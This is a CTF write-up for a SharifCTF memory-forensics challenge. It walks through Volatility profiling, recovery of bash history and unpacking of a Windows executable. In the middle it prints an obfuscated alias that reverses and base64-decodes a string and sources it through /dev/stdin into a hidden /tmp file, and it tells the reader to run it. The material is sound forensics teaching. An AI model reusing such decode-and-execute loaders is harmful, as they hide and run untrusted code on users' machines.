Memdump (400)

Question:

We we trying to capture the flag too! But that’s what it left for us.

memdump.xz

Write-Up:

Un-archive the given xz file:

unxz memdump.xz

Detect the type of the given image:

volatility -f memdump imageinfo

which outputs:

Suggested Profile(s) : No suggestion (Instantiated with Linux_Ubuntu_Raring_13_04-desktop-amd64_kernel-3_8_0-35-generic_x64)
             AS Layer1 : FileAddressSpace (/home/user1/memdump)
              PAE type : No PAE
                   DTB : 0x1c0d000L

Nothing! Zilch!

So, open the file in a hex editor, and look for famous OS names.

Ubuntu can be easily spotted, and with a little search, you can also find the kernel version 3.13.1, and the architecture is x64.

Download Ubuntu 8 x64 profiles from Volatility Foundation Profiles.

Put them in volatility's plugin directory:

/usr/lib/python2.7/dist-packages/volatility/plugins/overlays/linux/

List volatility profiles for Ubuntu:

volatility --plugins=tools/linux --info | grep -i Ubuntu

which outputs:

LinuxUbuntu1404x64                                                   - A Profile for Linux Ubuntu1404 x64
Linux_Ubuntu_Precise_12_04-desktop-amd64_kernel-3_8_0-29-generic_x64 - A Profile for Linux _Ubuntu_Precise_12.04-desktop-amd64_kernel-3.8.0-29-generic_ x64
Linux_Ubuntu_Precise_12_04-desktop-i386_kernel-3_8_0-29-generic_x86  - A Profile for Linux _Ubuntu_Precise_12.04-desktop-i386_kernel-3.8.0-29-generic_ x86
Linux_Ubuntu_Quantal_12_10-desktop-amd64_kernel-3_5_0-45-generic_x64 - A Profile for Linux _Ubuntu_Quantal_12.10-desktop-amd64_kernel-3.5.0-45-generic_ x64
Linux_Ubuntu_Raring_13_04-desktop-amd64_kernel-3_8_0-35-generic_x64  - A Profile for Linux _Ubuntu_Raring_13.04-desktop-amd64_kernel-3.8.0-35-generic_ x64
Linux_Ubuntu_Raring_13_04-desktop-i386_kernel-3_8_0-35-generic_x86   - A Profile for Linux _Ubuntu_Raring_13.04-desktop-i386_kernel-3.8.0-35-generic_ x86
Linux_Ubuntu_Saucy_13_10-desktop-amd64_kernel-3_11_0-15-generic_x64  - A Profile for Linux _Ubuntu_Saucy_13.10-desktop-amd64_kernel-3.11.0-15-generic_ x64
Linux_Ubuntu_Saucy_13_10-desktop-i386_kernel-3_11_0-15-generic_x86   - A Profile for Linux _Ubuntu_Saucy_13.10-desktop-i386_kernel-3.11.0-15-generic_ x86

Next, we will use the general LinuxUbuntu1404x64 profile.

volatility -f memdump --profile LinuxUbuntu1404x64 linux_bash

which outputs:

Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    1136 bash                 2016-02-03 11:31:37 UTC+0000   netstat -natp
    1136 bash                 2016-02-03 11:32:21 UTC+0000   history
    1136 bash                 2016-02-03 11:32:28 UTC+0000   startx
    1136 bash                 2016-02-03 11:32:35 UTC+0000   history
    1136 bash                 2016-02-03 11:32:55 UTC+0000   passwd
    1136 bash                 2016-02-03 11:33:31 UTC+0000   ifconfig
    1136 bash                 2016-02-03 11:33:37 UTC+0000   curl ctf.sharif.edu
    1136 bash                 2016-02-03 11:33:43 UTC+0000   curl ctf.sharif.edu | grep till
    1136 bash                 2016-02-03 11:33:49 UTC+0000   curl -s paste.debian.net/plain/343376 | cut -d "_not"
    1136 bash                 2016-02-03 11:34:11 UTC+0000   curl -s paste.debian.net/plain/343376 | tr -d "_not"
    1136 bash                 2016-02-03 11:34:51 UTC+0000   curl -s paste.debian.net/plain/343376 | base64 | rev
    1136 bash                 2016-02-03 11:34:58 UTC+0000   top
    1136 bash                 2016-02-03 11:35:04 UTC+0000   history
    1136 bash                 2016-02-03 11:35:09 UTC+0000   curl -s ctf.sharif.edu | grep till
    1136 bash                 2016-02-03 11:35:15 UTC+0000   curl -s ctf.sharif.edu | grep till | sed -e 's/20:00/30:00/g'
    1136 bash                 2016-02-03 11:35:22 UTC+0000   blahblah
    1136 bash                 2016-02-03 11:35:29 UTC+0000   echo blahblah
    1136 bash                 2016-02-03 11:35:35 UTC+0000   curl -I ctf.sharif.edu
    1136 bash                 2016-02-03 11:35:42 UTC+0000   curl -I ctf.sharif.edu | grep ETag | cut -d "\"" -f2
    1136 bash                 2016-02-03 11:35:48 UTC+0000   curl -s -I ctf.sharif.edu | grep ETag | cut -d "\"" -f2
    1136 bash                 2016-02-03 11:35:53 UTC+0000   curl ctftime.org
    1136 bash                 2016-02-03 11:36:05 UTC+0000   curl https://ctftime.org
    1136 bash                 2016-02-03 11:36:11 UTC+0000   curl https://ctftime.org/upcoming | grep -i SharifCTF
    1136 bash                 2016-02-03 11:36:17 UTC+0000   curl -s "https://ctftime.org/upcoming " | grep -i SharifCTF
    1136 bash                 2016-02-03 11:36:23 UTC+0000   curl -s "https://ctftime.org/upcoming " | grep -i flag
    1136 bash                 2016-02-03 11:36:35 UTC+0000   echo "woow :) :)"
    1136 bash                 2016-02-03 11:36:41 UTC+0000   watch curl -s "https://ctftime.org/Upcoming | grep -i flag"
    1136 bash                 2016-02-03 11:37:00 UTC+0000   history
    1136 bash                 2016-02-03 11:37:05 UTC+0000   ping google.com
    1136 bash                 2016-02-03 11:37:13 UTC+0000   ps aux
    1136 bash                 2016-02-03 11:37:19 UTC+0000   nslookup ctf.sharif.edu
    1136 bash                 2016-02-03 11:37:24 UTC+0000   ls -ah
    1136 bash                 2016-02-03 11:37:29 UTC+0000   ls -la
    1136 bash                 2016-02-03 11:37:33 UTC+0000   uptime
    1136 bash                 2016-02-03 11:37:40 UTC+0000   clear

Trying to delve into blahblah process space:

volatility -f memdump --profile LinuxUbuntu1404x64 linux_pslist

Output:

Offset             Name                 Pid             Uid             Gid    DTB                Start Time
------------------ -------------------- --------------- --------------- ------ ------------------ ----------
0xffff880005990000 init                 1               184466...723524 18...8 0x0000000005bfe000 2016-02-03 11:29:26 UTC+0000
0xffff880005990a30 kthreadd             2               184466...532164 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005991460 ksoftirqd/0          3               184466...532356 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059928c0 kworker/0:0H         5               184466...533124 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059932f0 kworker/u2:0         6               184466...533508 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005993d20 rcu_sched            7               184466...533700 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005994750 rcuos/0              8               184466...533892 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005995180 rcu_bh               9               184466...652356 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005995bb0 rcuob/0              10              184466...652548 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059965e0 migration/0          11              184466...652740 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005997010 watchdog/0           12              184466...653508 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f0000 khelper              13              184466...653892 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f0a30 kdevtmpfs            14              184466...654084 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f1460 netns                15              184466...909188 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f1e90 khungtaskd           16              184466...150852 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f28c0 writeback            17              184466...151236 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f32f0 ksmd                 18              184466...303428 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f3d20 crypto               19              184466...303812 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f4750 kintegrityd          20              184466...304196 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f5180 bioset               21              184466...304580 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f5bb0 kblockd              22              184466...305348 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f65e0 ata_sff              23              184466...892612 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f7010 khubd                24              184466...922308 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b58000 md                   25              184466...923076 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b58a30 devfreq_wq           26              184466...923652 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b59460 kworker/u2:1         27              184466...512324 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b59e90 kworker/0:1          28              184466...188996 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b5a8c0 kswapd0              29              184466...108036 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b5b2f0 fsnotify_mark        30              184466...109380 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b5bd20 ecryptfs-kthrea      31              184466...109956 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c53d20 kthrotld             43              184466...209796 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c54750 acpi_thermal_pm      44              184466...133124 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c532f0 scsi_eh_0            45              184466...359108 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c528c0 scsi_tmf_0           46              184466...359492 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c51e90 scsi_eh_1            47              184466...360068 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c51460 scsi_tmf_1           48              184466...360452 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c50000 ipv6_addrconf        50              184466...544324 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006c29e90 deferwq              70              184466...720260 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006c29460 charger_manager      71              184466...720644 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006c2f010 kpsmoused            117             184466...099588 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006c2bd20 kworker/0:2          118             184466...101892 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c565e0 scsi_eh_2            119             184466...420548 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c55bb0 scsi_tmf_2           120             184466...420164 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c57010 kworker/0:1H         121             184466...419588 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006f08000 jbd2/sda1-8          131             184466...455044 18...8 ------------------ 2016-02-03 11:29:27 UTC+0000
0xffff880006f09e90 ext4-rsv-conver      132             184466...453892 18...6 ------------------ 2016-02-03 11:29:27 UTC+0000
0xffff880002921460 upstart-udev-br      264             184466...017668 18...2 0x0000000002917000 2016-02-03 11:29:31 UTC+0000
0xffff880002920000 systemd-udevd        270             184466...644356 18...0 0x0000000002930000 2016-02-03 11:29:31 UTC+0000
0xffff880004d37010 upstart-file-br      391             184466...970308 18...2 0x0000000004d42000 2016-02-03 11:29:32 UTC+0000
0xffff880004d31e90 dbus-daemon          394             184466...170372 18...6 0x0000000000562000 2016-02-03 11:29:33 UTC+0000
0xffff880004d365e0 rsyslogd             396             184466...121476 18...0 0x0000000004df7000 2016-02-03 11:29:33 UTC+0000
0xffff880006c28a30 systemd-logind       422             184466...123012 18...6 0x0000000004d27000 2016-02-03 11:29:33 UTC+0000
0xffff880004d35bb0 upstart-socket-      462             184466...849988 18...2 0x0000000000558000 2016-02-03 11:29:34 UTC+0000
0xffff880004e21e90 dhclient             540             184466...335364 18...8 0x00000000078ac000 2016-02-03 11:29:34 UTC+0000
0xffff880004e265e0 getty                680             184466...711492 18...6 0x0000000004d52000 2016-02-03 11:29:35 UTC+0000
0xffff880004e25bb0 getty                683             184466...969540 18...4 0x0000000004ee1000 2016-02-03 11:29:35 UTC+0000
0xffff880006c2c750 getty                690             184466...641988 18...2 0x000000000379b000 2016-02-03 11:29:35 UTC+0000
0xffff880006c2e5e0 getty                691             184466...699844 18...8 0x00000000037ab000 2016-02-03 11:29:35 UTC+0000
0xffff880006f0e5e0 getty                693             184466...645700 18...4 0x00000000037e5000 2016-02-03 11:29:35 UTC+0000
0xffff880003171e90 acpid                710             184466...780676 18...0 0x00000000037f6000 2016-02-03 11:29:35 UTC+0000
0xffff8800029265e0 sshd                 725             184466...387780 18...4 0x00000000005e4000 2016-02-03 11:29:35 UTC+0000
0xffff880002f6f010 atd                  773             184466...347524 18...8 0x00000000030be000 2016-02-03 11:29:35 UTC+0000
0xffff880002f6d180 cron                 774             184466...169028 18...2 0x00000000037f2000 2016-02-03 11:29:35 UTC+0000
0xffff880005b5f010 kauditd              900             184466...864196 18...0 ------------------ 2016-02-03 11:29:50 UTC+0000
0xffff880004e25180 getty                1047            184466...708868 18...2 0x0000000003131000 2016-02-03 11:31:09 UTC+0000
0xffff880005b5dbb0 sshd                 1093            184466...922436 18...0 0x0000000004fa7000 2016-02-03 11:31:34 UTC+0000
0xffff880006f08a30 sshd                 1135            184466...849412 18...6 0x000000000307b000 2016-02-03 11:31:36 UTC+0000
0xffff880006f0dbb0 bash                 1136            184466...902404 18...8 0x0000000000159000 2016-02-03 11:31:36 UTC+0000
0xffff880005b5e5e0 kworker/u2:2         1166            184466...788612 18...6 ------------------ 2016-02-03 11:34:35 UTC+0000

No such process is found! Perhaps it was an alias.

In the hex editor, look for blahblah=, but you won't find anything! It's possible that a portion of memory is overwritten by another.

If you search the dump for various outputs of the command linux_bash (see above), you'll eventually comeup with a part like this:

6CDBC1D     00 00 00 68 69 73 74 6f  72 79 0d 70 69 6e 67 20  67 6f 6f 67 6c 65 2e 63  6f 6d 0d 03 70   ...history.ping google.com..p
6CDBC3A     73 20 61 75 78 0d 6e 73  6c 6f 6f 6b 75 70 20 63  74 66 2e 73 68 61 72 69  66 2e 65 64 75   s aux.nslookup ctf.sharif.edu
6CDBC57     0d 6c 73 20 2d 61 68 0d  6c 73 20 2d 6c 61 0d 75  70 74 69 6d 65 0d 63 6c  65 61 72 0d 68   .ls -ah.ls -la.uptime.clear.h
6CDBC74     62 6c 61 68 3d 27 65 63  68 6f 20 3d 6f 77 59 31  4a 48 62 67 30 79 63 67  67 47 64 30 42   blah='echo =owY1JHbg0ycggGd0B
6CDBC91     6e 4f 76 38 53 4e 30 34  53 4d 34 4d 6a 4c 31 4d  6a 4c 31 49 7a 4c 71 74  30 54 77 46 33   nOv8SN04SM4MjL1MjL1IzLqt0TwF3
6CDBCAE     62 20 7c 20 72 65 76 20  7c 20 6f 70 65 6e 73 73  6c 20 65 6e 63 20 2d 61  20 2d 64 20 7c   b | rev | openssl enc -a -d |
6CDBCCB     20 72 65 76 20 7c 20 2e  20 2f 64 65 76 2f 73 74  64 69 6e 20 3e 20 2f 74  6d 70 2f 2e 4b    rev | . /dev/stdin > /tmp/.K
6CDBCE8     76 43 66 35 36 27 0d 68  69 73 74 6f 72 79 0d 70  61 73 73 77 64 0d 0d 69  66 63 6f 6e 66   vCf56'.history.passwd..ifconf
6CDBD05     69 67 0d 63 75 72 6c 20  63 74 66 2e 73 68 61 72  69 66 2e 65 64 75 0d 63  75 72 6c 20 63   ig.curl ctf.sharif.edu.curl c
6CDBD22     74 66 2e 73 68 61 72 69  66 2e 65 64 75 20 7c 20  67 72 65 70 20 74 69 6c  6c 0d 63 75 72   tf.sharif.edu | grep till.cur
6CDBD3F     6c 20 2d 73 20 70 61 73  74 65 2e 64 65 62 69 61  6e 2e 6e 65 74 2f 70 6c  61 69 6e 2f 33   l -s paste.debian.net/plain/3
6CDBD5C     34 33 33 37 36 20 7c 20  63 75 74 20 2d 64 20 22  5f 6e 6f 74 22 0d 0d 63  75 72 6c 20 2d   43376 | cut -d "_not"..curl -
6CDBD79     73 20 70 61 73 74 65 2e  64 65 62 69 61 6e 2e 6e  65 74 2f 70 6c 61 69 6e  2f 33 34 33 33   s paste.debian.net/plain/3433
6CDBD96     37 36 20 7c 20 74 72 20  2d 64 20 22 5f 6e 6f 74  22 0d 63 75 72 6c 20 2d  73 20 70 61 73   76 | tr -d "_not".curl -s pas
6CDBDB3     74 65 2e 64 65 62 69 61  6e 2e 6e 65 74 2f 70 6c  61 69 6e 2f 33 34 33 33  37 36 20 7c 20   te.debian.net/plain/343376 |
6CDBDD0     62 61 73 65 36 34 20 7c  20 72 65 76 0d 74 6f 70  0d 71 68 69 73 74 6f 72  79 0d 63 75 72   base64 | rev.top.qhistory.cur
6CDBDED     6c 20 2d 73 20 63 74 66  2e 73 68 61 72 69 66 2e  65 64 75 20 7c 20 67 72  65 70 20 74 69   l -s ctf.sharif.edu | grep ti
6CDBE0A     6c 6c 0d 10 00 00 00 20  5f 00 00 00 00 00 00 10  00 00 00 00 00 00 c0 00  01 00 00 ea ff   ll..... _....................

Looking carefully, the following snippet stands out:

.hblah='echo =owY1JHbg0ycggGd0BnOv8SN04SM4MjL1MjL1IzLqt0TwF3b | rev | openssl enc -a -d | rev | . /dev/stdin > /tmp/.KvCf56'

Obviously, blahblah= is overridden, and only hblah= remains. But, voilà, we now know how the alias blahblah is defined!

Now run the following:

alias blahblah='echo =owY1JHbg0ycggGd0BnOv8SN04SM4MjL1MjL1IzLqt0TwF3b | rev | openssl enc -a -d | rev | . /dev/stdin > /tmp/.KvCf56'

blahblah

file /tmp/.KvCf56

which outputs:

/tmp/.KvCf56: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

So, we are dealing with a Windows executable file (aka PE). Run it under Windows, to get the following output:

I'm not the flag, but I may know it!

So, the flag is somewhere in this file.

Use PEid, and find out that the file is packed with ASPack.

Use your unpacker of choice (I used FUU), and unpack the file.

Check out the resources section of the PE file (say, with PEiD plugin resource viewer).

You'll see a category called flag, under which a PNG file exists:

Save and open the PNG file. Here is the flag (It must be horizontally flipped to increase the readability):